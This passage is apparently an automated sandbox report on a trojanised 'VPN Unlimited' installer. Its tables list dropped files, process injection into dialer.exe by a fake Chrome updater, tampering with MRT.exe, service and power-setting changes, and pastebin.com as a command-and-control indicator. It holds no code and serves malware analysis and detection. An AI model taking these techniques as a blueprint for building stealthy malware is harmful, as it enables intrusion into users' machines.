| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\mfc140ita.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA738.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA739.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.jcp | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcamp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\concrt140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.cat | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\CatRoot2\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb.jfm | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140jpn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA73A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\CatRoot2\edbres00001.jrs | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.jtx | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\CatRoot2\edbtmp.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA738.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA73A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140cht.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3040 set thread context of 3948 | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 2292 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 2164 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4508 set thread context of 5020 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 4676 set thread context of 1896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-47R9N.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-G32NS.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-VR72U.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-H1N09.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-A5UDN.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5Positioning.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\msvcr100.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\QtWebChannel\declarative_webchannel.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64_8\is-12DK8.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-ICBPA.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\qtquickcontrols2universalstyleplugin.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-1R099.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-F3J9D.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-16117.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5PrintSupport.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-7LIQE.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-HTQFE.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-J11RD.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-73AGP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5WebEngineWidgets.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-O8IRC.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-5LCEV.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-366G9.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-2P6VN.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-T7P6L.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-L6P8T.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\scripts\is-3BTMM.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-MMNHK.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-convert-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-process-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Window.2\is-A580Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-82VOP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-8TCF0.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-370MO.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-A43I2.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick.2\is-2FQT4.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-D59U1.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-LJP4T.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Templates.2\is-MR8IU.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-GJEGG.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-V3T3B.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-JF7NQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-EMS3K.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\QtQuick\Layouts\qquicklayoutsplugin.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-E0B57.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-libraryloader-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-AMNOT.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-73J6Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5Network.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5QmlModels.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-console-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-HQCSB.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-KM5QP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-L2SQM.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-S64FN.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-HNENE.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-U1AG4.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-runtime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\imageformats\is-G8T0L.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-381O5.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\libcrypto-3-x64.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-IA13D.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-R6BNP.tmp | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e5895b3.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF7F97ED4D5EEE19E5.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB376DF80E10E6743.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5895c6.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF379FF2E62301637A.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9D75.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF088D0DB3E4C3D553.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9EED.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{D5D19E2F-7189-42FE-8103-92CD1FA457C2} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9F99.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF16603237C5F065F8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895dc.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF213DEF1E17F4658B.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895c5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF3BEE3B3B4B1C7A76.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\e5895b3.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9CD7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895c6.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFF8FA4609724A7E1B.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{0025DD72-A959-45B5-A0A3-7EFEB15A8050} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5895db.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5895dc.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
